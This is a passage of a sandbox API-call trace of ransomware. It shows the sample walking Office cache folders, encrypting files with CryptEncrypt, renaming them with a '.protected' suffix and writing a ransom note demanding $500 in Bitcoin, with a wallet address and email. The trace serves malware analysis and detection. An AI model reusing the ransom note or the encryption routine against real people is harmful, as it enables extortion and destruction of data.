Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 79 [0056.131] StrStrW (lpFirst="Proofing.xml", lpSrch=".txt") returned 0x0 [0056.131] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 79 [0056.131] StrStrW (lpFirst="Proofing.xml", lpSrch=".rar") returned 0x0 [0056.131] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 79 [0056.131] StrStrW (lpFirst="Proofing.xml", lpSrch=".zip") returned 0x0 [0056.131] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x32b, lpOverlapped=0x0) returned 1 [0056.260] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffcd5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.260] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x32b, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x32b, lpOverlapped=0x0) 
returned 1 [0056.261] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.261] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0056.261] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0056.261] CloseHandle (hObject=0xb4) returned 1 [0056.262] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.protected") returned 89 [0056.262] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.protected")) returned 1 [0056.262] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.262] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0056.262] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0056.262] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0056.262] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0056.262] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0056.262] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0056.262] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0056.262] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0056.262] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.262] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.263] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0056.263] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0056.263] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0056.263] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0056.263] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0056.263] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0056.263] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0056.263] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x16fc, lpOverlapped=0x0) returned 1 [0056.345] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffe904, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.345] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, 
nNumberOfBytesToWrite=0x16fc, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x16fc, lpOverlapped=0x0) returned 1 [0056.345] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.345] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0056.345] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0056.345] CloseHandle (hObject=0xb4) returned 1 [0056.527] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0056.527] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0056.527] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0056.527] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0056.527] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0056.527] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0056.528] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0056.528] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, 
lpOverlapped=0x0) returned 1 [0056.528] lstrlenA (lpString="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") returned 684 [0056.528] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0056.529] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0056.529] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0056.529] CloseHandle (hObject=0xa4) returned 1 [0056.529] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0056.529] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0056.529] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0056.529] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0056.529] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0056.529] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0056.529] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C") returned 66 [0056.529] lstrcmpW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0056.529] lstrcmpW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0056.529] wnsprintfW (in: 
pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*") returned 68 [0056.529] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0056.603] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0056.603] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0056.603] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0056.603] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0056.603] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0056.603] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\.") returned 68 [0056.603] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.603] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0056.603] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0056.603] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.603] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.603] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\." 
(normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0056.603] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.603] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0056.603] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0056.603] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0056.603] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0056.603] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0056.603] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\..") returned 69 [0056.603] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0056.603] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.603] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0056.603] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0056.603] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.603] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.603] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\.." 
(normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0056.604] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.604] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="Windows") returned -1 [0056.604] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="Program Files") returned -1 [0056.604] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="Program Files (x86)") returned -1 [0056.604] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="$Recycle.bin") returned 1 [0056.604] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="System Volume Information") returned -1 [0056.604] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 82 [0056.604] StrStrIW (lpFirst="Office32MUI.msi", lpSrch=".protected") returned 0x0 [0056.604] lstrcmpW (lpString1="Office32MUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0056.604] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.604] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.604] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0056.604] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 82 
[0056.604] StrStrW (lpFirst="Office32MUI.msi", lpSrch=".txt") returned 0x0 [0056.604] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 82 [0056.604] StrStrW (lpFirst="Office32MUI.msi", lpSrch=".rar") returned 0x0 [0056.604] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 82 [0056.604] StrStrW (lpFirst="Office32MUI.msi", lpSrch=".zip") returned 0x0 [0056.604] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0056.612] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.612] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0056.612] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.612] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0056.620] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0056.620] CloseHandle (hObject=0xb4) returned 1 [0056.645] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.protected") returned 92 
[0056.645] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.protected")) returned 1 [0056.645] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.646] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="Windows") returned -1 [0056.646] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="Program Files") returned -1 [0056.646] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="Program Files (x86)") returned -1 [0056.646] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="$Recycle.bin") returned 1 [0056.646] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="System Volume Information") returned -1 [0056.646] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 82 [0056.646] StrStrIW (lpFirst="Office32MUI.xml", lpSrch=".protected") returned 0x0 [0056.646] lstrcmpW (lpString1="Office32MUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0056.646] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.646] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.646] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0056.646] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 82 [0056.646] StrStrW (lpFirst="Office32MUI.xml", lpSrch=".txt") returned 0x0 [0056.646] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 82 [0056.646] StrStrW (lpFirst="Office32MUI.xml", lpSrch=".rar") returned 0x0 [0056.646] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 82 [0056.646] StrStrW (lpFirst="Office32MUI.xml", lpSrch=".zip") returned 0x0 [0056.646] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x567, lpOverlapped=0x0) returned 1 [0056.656] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffa99, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.656] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x567, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x567, lpOverlapped=0x0) returned 1 [0056.656] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.656] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0056.656] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 
1 [0056.656] CloseHandle (hObject=0xb4) returned 1 [0056.657] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.protected") returned 92 [0056.657] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.protected")) returned 1 [0056.658] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.658] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="Windows") returned -1 [0056.658] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="Program Files") returned -1 [0056.658] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="Program Files (x86)") returned -1 [0056.658] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="$Recycle.bin") returned 1 [0056.658] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="System Volume Information") returned -1 [0056.658] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 79 [0056.658] StrStrIW (lpFirst="OWOW32LR.cab", lpSrch=".protected") returned 0x0 [0056.658] lstrcmpW (lpString1="OWOW32LR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0056.658] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.658] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.658] CreateFileW 
(lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0056.658] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 79 [0056.658] StrStrW (lpFirst="OWOW32LR.cab", lpSrch=".txt") returned 0x0 [0056.658] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 79 [0056.658] StrStrW (lpFirst="OWOW32LR.cab", lpSrch=".rar") returned 0x0 [0056.658] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 79 [0056.658] StrStrW (lpFirst="OWOW32LR.cab", lpSrch=".zip") returned 0x0 [0056.658] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0056.665] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.665] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, 